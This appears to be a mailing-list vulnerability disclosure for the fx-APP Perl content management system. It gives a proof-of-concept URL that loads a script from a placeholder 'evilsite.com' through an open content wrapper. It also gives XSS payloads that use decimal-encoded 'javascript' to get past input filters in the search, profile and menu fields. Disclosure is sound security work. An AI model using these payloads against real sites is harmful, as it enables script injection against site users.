<<< Date Index >>>     <<< Thread Index >>>

fx-APP Version 0.0.8.1



fx-APP Version 0.0.8.1

Homepage:
http://fx-app.org/

Effected files:
search input box
index.cgi
input boxes on your profile
adding a menu item

-------------------------------------------------------

I noticed there was already several BID's on the a script WebAPP: 

http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=webapp&x=22&y=2
 

However, none on these were on a recently new cgi script called fx-APP, which 
looks similar to webAPP and as their 

homepage says:

"fx-APP is A Practical Perl content management system and portal written in 
Perl/CGI. fx-APP is up to par with Web standards so that it is more useable and 
multi-browser friendly. Includes mods, plugins/addons, etc. fx-APP utilises a 
flat file, so SQL database is not necessary. Easy to use and setup in a matter 
of minutes. fx-APP is Open source, licensed under GNU/GPL and free to download 
and use."

so I decided to submit with what I could find.

----------------------------------

fx-APP has a module called Tools, now the url of this module in the browser bar 
is:
http://www.example.com/index.cgi?action=showhtml&url=example.com/usefultools.htm

Upon testing that I was able to find you can visit any page on any offsite 
domain, much like using a content wrapper. In a way this could be harmful, 
because if a malicious user wanted to load up ascript on another site, he 
could, and he would still be on the fx-APP site because the page loads in an 
iframe. Poc:

http://www.example.com/index.cgi?action=showhtml&url=evilsite.com/badcode.js

XSS Vulnerabilities:

When inputting the [iframe] tag in the search box I noticed its converted to 
[yframe] and javascript is converted to javascrypt, so one way of bypassing 
this is to use thedecimal value of javascript. For PoC put this in the search 
box:

<IMG SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert('XSS')>

----------------------

Profile input box XSS vulnerabilities:

Data in the profile boxes such as url, website, comment, signature etc are not 
properally filtered. This could lead 

toauser creating an XSS attack. One way tobypass these filters, much like the 
way above, we convert the word 

javascript into its decimal equivlent and addafew closing and opening tags:

For PoC try putting the following in the url, website, comment or signature box:

'>'><IMG SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert('XSS')><'<'

Now if you'd like to see a XSS example on the same screen as editing your 
profile just put in:

<""><""><IMG 
SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert('XSS')><""><"">

and when you hit edit profile, you will notice the popup on that page again as 
well.

-----------------

Adding a menu item XSS vulnerability:

Userinput isn't correctly filtered here either, whena user logs in, he can go 
to "Edit My Menu", and then "Add Menu Item", in thes einput boxes auser can put:

<IMG SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert('XSS')>